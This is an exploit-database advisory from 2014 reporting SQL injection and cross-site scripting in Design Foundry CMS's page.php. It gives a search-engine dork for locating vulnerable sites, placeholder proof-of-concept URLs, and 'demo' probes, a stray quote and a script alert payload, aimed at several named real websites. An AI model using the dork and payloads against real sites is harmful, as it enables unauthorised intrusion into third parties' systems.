Design Foundry Cross Site Scripting / SQL Injection

2014.07.22

Credit: Hekt0r

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89
CWE-79

Dork: intext:\"Site by The Design Foundry\"

[+] Title: Foundry CMS Multiple Vulnerability
[+] Date: 2014/07/20
[+] Author: Hekt0r
[+] Vendor Homepage: www.design-foundry.co.uk
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable Files: /page.php
[+} Dork : intext:"Site by The Design Foundry"
### POC:
[+] Sql Injection: http://site/page.php?id=[SQL-Injection]
[+] XSS: http://site/page.php?id=[XSS]
### Demo:
[+] Sql injection: http://www.reXsonatehub.co.uk/page.php?id=1'
http://www.sutcXliffe.co.uk/page.php?id=1'
http://www.warmXerenergyservices.com/page.php?id=25'
http://www.my-Xmaintenance.com/page.php?id=1'
[+] Xss: http://www.resonatXehub.co.uk/page.php?id=
<script>alert(/xss/)</script>
http://www.sutcliffe.co.uk/page.php?id=
<script>alert(/xss/)</script>
http://www.warmerenergyservices.com/page.php?id=
<script>alert(/xss/)</script>
http://www.my-maintenance.com/page.php?id=
<script>alert(/xss/)</script>
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire,Ali Ahmady Saeed.Jok3r,
M4hdi,
ALIREZA_PROMIS And All members of Iran Security Group
[+] iransec.net

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Design Foundry Cross Site Scripting / SQL Injection

Dork: intext:\"Site by The Design Foundry\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.